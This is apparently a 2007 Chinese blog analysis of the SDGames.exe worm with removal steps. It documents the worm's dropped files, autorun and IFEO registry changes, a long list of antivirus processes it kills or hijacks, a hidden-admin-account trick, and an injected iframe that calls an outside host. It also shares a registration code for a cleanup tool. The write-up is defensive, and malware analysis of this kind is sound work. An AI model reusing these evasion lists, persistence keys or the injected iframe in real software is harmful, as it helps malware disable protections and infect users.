警惕恶性病毒SDGames.exe(小瓢虫)

作者:清新阳光     ( [url]http://hi.baidu.com/newcenturysun[/url])
日期:2007/12/08                      (转载请保留此声明)

病毒样本来自卡饭,病毒行为恶劣,主要表现为:
1.攻击杀毒软件之后进行IFEO映像劫持
2.感染htm等网页文件
3.感染或覆盖 exe等可执行文件
4.破坏安全模式
5.破坏显示隐藏文件 文件夹选项等
6.修改系统时间并锁定时间
7.可通过U盘等移动存储传播
8.关闭 Windows 防火墙等服务并打开许多危险服务,并使得用户磁盘被共享
9.后台添加账户并设定管理员权限
10.修改某些文件关联

下面为具体分析
File: SDGames.exe
Size: 59282 bytes
File Version: 3.02
Modified: 2007年12月6日, 17:56:32
MD5: FC334FFCF5AFF3CA8235705D61F62990
SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC
CRC32: 1DD096C2

1.病毒运行后,释放如下文件或副本
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的
并且在每个分区释放Windows.url,新建文件夹.url,Recycleds.url指向该分区根目录下的SDGames.exe
诱使用户点击

2.修改reg和txt文件关联指向%systemroot%\system32\SDGames.exe

3.删除HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
破坏安全模式

4.创建自启动项目
[HKEY_CURRENT_USER\Software\ Microsoft\Windows NT\CurrentVersion\Windows]
    <load><%systemroot%\system32\SDGames.exe> [SDGame]
    <run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <Winstary><%systemroot%\system32\SDGames.exe> [SDGame]

5.破坏系统的一些功能
禁用cmd:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
破坏显示隐藏文件:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
使得文件扩展名无法显示:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
隐藏控制面板:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
禁用注册表编辑器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
禁用任务管理器
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
修改IE主页为:[url]http://www.[/url]*.10mb.cn
修改IE默认页为:wangma
隐藏文件夹选项
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

6.关闭如下服务并将其启动类型设为禁用
Alg
sharedaccess
wuauserv

7.开启下列服务并将其启动类型设为自动
Terminal Services
winmgmt
lanmanserver

8.%systemroot%\system32\netshare.cmd将用户的所有磁盘设为共享
 
Snap2.jpg (17.39 KB)
2007-12-8 15:57

9.添加一个名为guest的账户,并将其设置为管理员权限
10.攻击反病毒软件,利用Avpser.cmd强制结束一些杀毒软件进程
RavMonD.exe
RavStub.exe
Anti*
AgentSvr*
CCenter*
Rsaupd*
SmartUp*
FileDsty*
RegClean*
360tray*
360safe*
kabaload*
safelive*
KASTask*
kpFW32*
kpFW32X*
KvXP_1*
KVMonXP_1*
KvReport*
KvXP*
KVMonXP*
nter*
TrojDie*
avp.com
KRepair.COM
Trojan*
KvNative*
Virus*
Filewall*
Kaspersky*
JiangMin*
RavMonD*
RavStub*
RavTask*
adam*
cSet*
PFWliveUpdate*
mmqczj*
Trojanwall*
Ras.exe
runiep.exe
avp.exe
PFW.exe
rising*
ikaka*
.duba*
kingsoft*
木马*
社区*
aswBoot*
MainCon*
Regs*
AVP*
Task*
regedit*
Ras*
srgui*
norton*
avp*
fire*
spy*
bullguard*
PersFw*
KAV*
ZONEALARM*
SAFEWEB*
OUTPOST*
ESAFE*
clear*
BLACKICE*
360safe.exe
Shadowservice.exe
v3webnt.exe
v3sd32.exe
v3monsvc.exe
sysmonnt.exe
hkcmd.exe
DNTUS26.EXE
AhnSD.exe
CTFMON.EXE
MonsysNT.exe
awrem32.exe
WINAW32.EXE
PNTIOMON.exe
avgw.exe
avgcc32.exe
PROmon.exe
PNTIOMON.exe
MagicSet.exe
MainCon.exe
TrCleaner.exe
WmNetPro.exe
修复*
保护*

11.映像劫持杀毒软件和一些常用工具
360rpt.exe
360Safe.exe
360tray.EXE
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
FileDsty.exe
FTCleanerShell.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
Knod32kui.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
MainCon.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
msconfig.exe
NAVSetup.exe
nod32krn.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
QQ.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
Shadowservice.exe
shcfg32.exe
SmartUp.exe
SREng.exe
srgui.exe
symlcsvc.exe
SysSafe.exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE.exe
WoptiClean.exe
zxsweep.exe

12.遍历感染非系统分区的exe文件(覆盖方式)
 
Snap1.jpg (13.53 KB)
2007-12-8 15:57


13.遍历感染非系统分区的jsp asp php htm html hta文件
在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*.10mb.cn/" name="Myframe"
align="center" border="0">的代码

14.修改系统时间的年份为2030年,并禁止用户修改时间

15.隐藏系统文件夹

解决办法:
下载sreng: [url]http://download.kztechs.com/files/sreng2.zip[/url]
Icesword: [url]http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip[/url]

1.解压缩Icesword
把Icesword改名为1.exe运行
进程中 找到SDGames.exe 右击它 结束进程
然后点击 Icesword左下角的 文件 按钮
找到如下文件并删除
%systemroot%\system32\SDGames.exe
%systemroot%\system32\Taskeep.vbs
%systemroot%\system32\Avpser.cmd
%systemroot%\system32\netshare.cmd
%systemroot%\system32\AUTORUN.INF
以及各个分区下面的
SDGames.exe,AUTORUN.INF,Windows.url,新建文件夹.url,Recycleds.url
Snap3.jpg (92.18 KB)
2007-12-8 15:57


2.运行sreng
(由于时间已经被改为2030年 所以sreng会弹出过期提示,不用担心,输入下面的授权码即可使用)
用户名:teyqiu
授权号:26129027541185431409013556
打开sreng后 点击 系统修复-文件关联-修复
系统修复-Windows Shell/IE -全选-修复
高级修复-修复安全模式

3.还是sreng中
启动项目 注册表 删除如下项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><%systemroot%\system32\SDGames.exe> [SDGame]
    <run><%systemroot%\system32\SDGames.exe> [SDGame]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    <Winstary><%systemroot%\system32\SDGames.exe> [SDGame]
并删除所有红色的IFEO项目
启动项目 System.ini
删除Windows节点

4.取消磁盘共享
开始 运行 输入cmd 输入如下命令
net share c /delete
net share d /delete
...
以此类推 分别取消所有磁盘分区的共享

5.显示系统文件夹
开始 运行 输入cmd 输入如下命令
attrib -h %systemroot%\system32

6.修复受感染的htm等网页文件
推荐使用CSI的iframkill
下载地址: [url]http://www.vaid.cn/blog/read.php?9[/url]

你可能感兴趣的:(休闲,瓢虫,安全模式,IFEO,SDGames)